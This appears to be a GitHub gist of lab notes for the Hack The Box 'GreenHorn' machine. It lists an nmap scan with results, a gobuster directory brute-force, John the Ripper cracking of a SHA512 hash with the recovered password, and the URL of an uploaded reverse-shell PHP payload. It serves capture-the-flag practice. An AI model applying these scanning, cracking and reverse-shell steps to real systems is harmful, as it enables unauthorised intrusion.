Skip to content

Instantly share code, notes, and snippets.

@nacm
Last active October 3, 2024 07:35
Show Gist options
  • Save nacm/59b3ace983a05187b82a7c8a5883b219 to your computer and use it in GitHub Desktop.
Save nacm/59b3ace983a05187b82a7c8a5883b219 to your computer and use it in GitHub Desktop.
HTB GreenHorn
#Codes to run for HTB GreenHorn
#Scan
nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.10.11.25
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10
80/tcp open http nginx 1.18.0 (Ubuntu)
3000/tcp open ppp?
##Update host file
10.10.11.25 greenhorn.htb
#Gobuster
gobuster dir -u http://10.10.11.25:3000 -w /usr/share/wordlists/dirb/common.txt
#crack the hashed password with https://crackstation.net/
# or use John after exporting the hash
john --format=raw-sha512 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
iloveyou1
IP:
Open
http://greenhorn.htb/data/modules/payload/reverse_shell.php
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment